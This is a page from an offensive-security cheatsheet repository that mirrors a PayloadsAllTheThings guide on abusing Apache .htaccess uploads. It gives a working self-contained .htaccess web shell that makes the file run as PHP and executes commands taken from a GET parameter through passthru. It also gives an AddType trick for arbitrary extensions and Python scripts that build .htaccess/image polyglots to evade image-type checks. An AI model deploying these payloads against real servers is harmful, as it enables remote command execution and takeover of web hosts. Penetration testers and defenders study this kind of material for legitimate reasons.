daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

readme.md (3796B)


      1 ---
      2 title: ".htaccess"
      3 topic: "Upload Insecure Files"
      4 topicSlug: "upload-insecure-files"
      5 sourcePath: "Upload Insecure Files/Configuration Apache .htaccess/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # .htaccess
     12 
     13 Uploading an .htaccess file to override Apache rule and execute PHP.
     14 "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerable server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
     15 
     16 ## Summary
     17 
     18 * [AddType Directive](#addtype-directive)
     19 * [Self Contained .htaccess](#self-contained-htaccess)
     20 * [Polyglot .htaccess](#polyglot-htaccess)
     21 * [References](#references)
     22 
     23 ## AddType Directive
     24 
     25 Upload an .htaccess with : `AddType application/x-httpd-php .rce`
     26 Then upload any file with `.rce` extension.
     27 
     28 ## Self Contained .htaccess
     29 
     30 ```python
     31 # Self contained .htaccess web shell - Part of the htshell project
     32 # Written by Wireghoul - http://www.justanotherhacker.com
     33 
     34 # Override default deny rule to make .htaccess file accessible over web
     35 <Files ~ "^\.ht">
     36 Order allow,deny
     37 Allow from all
     38 </Files>
     39 
     40 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
     41 # the apache directives from the .htaccess file
     42 AddType application/x-httpd-php .htaccess
     43 ```
     44 
     45 ```php
     46 ###### SHELL ######
     47 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
     48 ```
     49 
     50 ## Polyglot .htaccess
     51 
     52 If the `exif_imagetype` function is used on the server side to determine the image type, create a `.htaccess/image` polyglot.
     53 
     54 [Supported image types](http://php.net/manual/en/function.exif-imagetype.php#refsect1-function.exif-imagetype-constants) include [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) and [WBMP](https://en.wikipedia.org/wiki/Wireless_Application_Protocol_Bitmap_Format). In `.htaccess` ignoring lines starting with `\x00` and `#`, you can use these scripts for generate a valid `.htaccess/image` polyglot.
     55 
     56 * Create valid `.htaccess/xbm` image
     57 
     58     ```python
     59     width = 50
     60     height = 50
     61     payload = '# .htaccess file'
     62 
     63     with open('.htaccess', 'w') as htaccess:
     64         htaccess.write('#define test_width %d\n' % (width, ))
     65         htaccess.write('#define test_height %d\n' % (height, ))
     66         htaccess.write(payload)
     67     ```
     68 
     69 * Create valid `.htaccess/wbmp` image
     70 
     71     ```python
     72     type_header = b'\x00'
     73     fixed_header = b'\x00'
     74     width = b'50'
     75     height = b'50'
     76     payload = b'# .htaccess file'
     77 
     78     with open('.htaccess', 'wb') as htaccess:
     79         htaccess.write(type_header + fixed_header + width + height)
     80         htaccess.write(b'\n')
     81         htaccess.write(payload)
     82     ```
     83 
     84 ## References
     85 
     86 * [Attacking Webservers Via .htaccess - Eldar Marcussen - May 17, 2011](https://web.archive.org/web/20200203171034/https://www.justanotherhacker.com:80/2011/05/htaccess-based-attacks.html)
     87 * [Protection from Unrestricted File Upload Vulnerability - Narendra Shinde - October 22, 2015](https://web.archive.org/web/20200812181326/https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
     88 * [Insomnihack Teaser 2019 / l33t-hoster - Ian Bouchard (@Corb3nik) - January 20, 2019](https://web.archive.org/web/20190125123231/http://corb3nik.github.io:80/blog/insomnihack-teaser-2019/l33t-hoster)